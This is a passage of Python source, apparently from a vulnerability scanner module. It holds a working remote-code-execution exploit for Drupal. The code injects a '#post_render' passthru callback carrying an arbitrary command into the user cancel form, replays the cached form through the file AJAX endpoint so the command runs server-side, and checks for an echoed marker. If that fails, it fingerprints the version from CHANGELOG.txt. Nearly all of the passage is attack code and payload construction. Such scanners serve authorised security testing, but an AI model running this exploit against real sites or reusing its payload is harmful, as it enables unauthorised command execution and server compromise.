            'destination': self.user_id + '/cancel?q[%23post_render][]=passthru&q[%23type]=markup&q[%23markup]=' + cmd
        }
        self.post_params = {
            'form_id': 'user_cancel_confirm_form',
            'form_token': self.form_token,
            '_triggering_element_name': 'form_id',
            'op': 'Cancel account'
        }
        self.r = self.session.post(self.url,
                                   params=self.get_params,
                                   data=self.post_params,
                                   headers=self.headers,
                                   timeout=self.timeout,
                                   verify=False)
        self.soup = BeautifulSoup(self.r.text, "html.parser")
        self.form = self.soup.find('form', {'id': 'user-cancel-confirm-form'})
        self.form_build_id = self.form.find('input', {
            'name': 'form_build_id'
        }).get('value')
        # Step 5: replay the cached form via the file AJAX callback so the
        # injected render array gets executed server-side.
        self.get_params = {
            'q': 'file/ajax/actions/cancel/#options/path/' + self.form_build_id
        }
        self.post_params = {'form_build_id': self.form_build_id}
        self.r = self.session.post(self.url,
                                   params=self.get_params,
                                   data=self.post_params,
                                   headers=self.headers,
                                   timeout=self.timeout,
                                   verify=False)
        # Marker echoed back (misinformation() filters false positives).
        if md in misinformation(self.r.text, md):
            self.vul_info["vul_data"] = dump.dump_all(self.r).decode(
                'utf-8', 'ignore')
            self.vul_info["prt_resu"] = "PoCSuCCeSS"
            self.vul_info[
                "vul_payd"] = '/cancel?q[%23post_render][]=passthru&q[%23type]=markup&q[%23markup]=' + cmd
            self.vul_info["prt_info"] = "[rce] [cmd:" + cmd + "]"
        else:
            # Fallback: fingerprint the Drupal version from CHANGELOG.txt and
            # flag "maybe vulnerable" when the patched versions are absent.
            self.request = requests.get(self.url + "/CHANGELOG.txt",
                                        data=self.payload,
                                        headers=self.headers,
                                        timeout=self.timeout,
                                        verify=False)
            self.rawdata = dump.dump_all(self.request).decode(
                'utf-8', 'ignore')
            self.allver = re.findall(r"([\d][.][\d]?[.]?[\d])",
                                     self.request.text)
            if self.request.status_code == 200 and r"Drupal" in self.request.text:
                if '7.59' not in self.allver and '8.5.3' not in self.allver:
                    self.vul_info["vul_data"] = dump.dump_all(
                        self.r).decode('utf-8', 'ignore')
                    self.vul_info["prt_resu"] = "PoC_MaYbE"
                    self.vul_info[
                        "vul_payd"] = '/cancel?q[%23post_render][]=passthru&q[%23type]=markup&q[%23markup]=' + cmd
                    self.vul_info[
                        "prt_info"] = "[maybe] [rce] [cmd:" + cmd + "]"
        verify.scan_print(self.vul_info)
    except requests.exceptions.Timeout:
        verify.timeout_print(self.vul_info["prt_name"])
    except requests.exceptions.ConnectionError:
        verify.connection_print(self.vul_info["prt_name"])
    except Exception as error:
        verify.error_print(self.vul_info["prt_name"])
    self.threadLock.release()